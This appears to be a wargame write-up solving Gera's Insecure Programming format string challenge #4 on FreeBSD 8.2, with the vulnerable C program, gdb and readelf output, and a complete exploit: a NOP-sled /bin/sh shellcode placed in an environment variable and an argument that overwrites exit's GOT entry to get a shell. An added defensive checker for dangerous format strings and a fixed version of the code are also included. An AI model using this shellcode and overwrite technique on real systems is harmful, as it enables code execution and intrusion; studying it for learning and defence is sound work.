Gera's Insecure Programming Format String #4



One more completed challenge is needed before we can declare format strings dead. This challenge from the format string section of Gera’s Insecure Programming is basically solvable using the same approach as challenge #3.

I am going to keep this post brief. If you want a more detailed description, see the challenge #3 write-up.

Gera’s challenge is posted below and can be found here.

/* fs4.c                                        *
 * specially crafted to feed your brain by gera */

/* Have you ever heard about code reusability?  */

int main(int argv,char **argc) {
        char buf[256];

        snprintf(buf,sizeof buf,"%s%6$hn",argc[1]);
        printf(buf);
}

As you may notice, the only difference is that direct parameter access (“%6$hn”) is used in the format string. As usual, the targeted platform is FreeBSD 8.2-RELEASE.
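An added example, not part of gera's code or this write-up: a small C checker that flags format strings carrying the %n family or direct parameter access (it flags fs4's own "%s%6$hn"), alongside a version of fs4's two calls with fixed formats and the user string passed only as an argument.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Walks a format string the way printf would and returns true if any
 * conversion writes to memory (%n, %hn, %hhn, %ln, ...) or selects its
 * argument by position ("%6$hn" style direct parameter access).  Either
 * one in a format that user data can reach is the fs4 bug in waiting. */
bool format_is_dangerous(const char *fmt)
{
    const char *p = fmt;
    while ((p = strchr(p, '%')) != NULL) {
        p++;                                   /* step past '%' */
        if (*p == '%') { p++; continue; }      /* "%%" is a literal percent */
        const char *q = p;
        while (isdigit((unsigned char)*q)) q++;
        if (*q == '$') return true;            /* direct parameter access */
        q = p;
        while (*q && strchr("-+ #0'", *q)) q++;              /* flags */
        while (isdigit((unsigned char)*q) || *q == '*') q++; /* width */
        if (*q == '.') {                                     /* precision */
            q++;
            while (isdigit((unsigned char)*q) || *q == '*') q++;
        }
        while (*q && strchr("hlLqjzt", *q)) q++;             /* length */
        if (*q == 'n') return true;            /* %n family writes memory */
        if (*q == '\0') return false;          /* dangling '%' at end */
        p = q + 1;                             /* skip the conversion char */
    }
    return false;
}

/* fs4's two calls with the bug removed: both formats are constant, contain
 * no %n and no "$", and the user string is only ever a "%s" argument. */
void echo_fixed(const char *arg)
{
    char buf[256];
    snprintf(buf, sizeof buf, "%s", arg);
    printf("%s\n", buf);
}
```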

> ./fs4 AAAABBBBCCCCDDDD
Segmentation fault (core dumped)
> gdb -q fs4 fs4.core
..snip..
#0  0x2816f329 in open () from /lib/libc.so.7
(gdb) x/i $eip
0x2816f329 <open+11965>:	mov    %dx,(%eax)
(gdb) printf "%p %p\n", $eax, $edx
0x44444444 0x10
(gdb) q
> 

From here, the steps are the same as in #3. The only difference is that 16 bytes are needed to trigger the vulnerability.

> readelf -r fs4

Relocation section '.rel.plt' at offset 0x2b0 contains 5 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
080496ec  00000107 R_386_JUMP_SLOT   00000000   _init_tls
080496f0  00000407 R_386_JUMP_SLOT   00000000   printf
080496f4  00000507 R_386_JUMP_SLOT   00000000   snprintf
080496f8  00000607 R_386_JUMP_SLOT   00000000   exit
080496fc  00000807 R_386_JUMP_SLOT   00000000   atexit

Once again, we look for an address in the PLT and use exit’s address. The payload is set up the same way as in all previous write-ups: in an environment variable, which was found at 0xbfbd6905. In the payload of the environment variable, we use the trap instruction (“\xcc”) to see if execution lands in the NOP sled.

> setenv SHELLCODE `perl -e 'print "\x90"x65536 ."\xcc"x100000 ."\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"'`
> ./fs4 AAAABBBBCCCC`perl -e 'print "\xfa\x96\x04\x08"."A"x49069'`
Trace/BPT trap (core dumped)

We hit our trap instruction; therefore, simply exchange the “\xcc” with “\x90” and we should get a shell.

> setenv SHELLCODE `perl -e 'print "\x90"x65536 ."\x90"x100000 ."\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"'` 
> ./fs4 AAAABBBBCCCC`perl -e 'print "\xfa\x96\x04\x08"."A"x49069'`              
$ 

lixor_: 4 and format string (FS): 0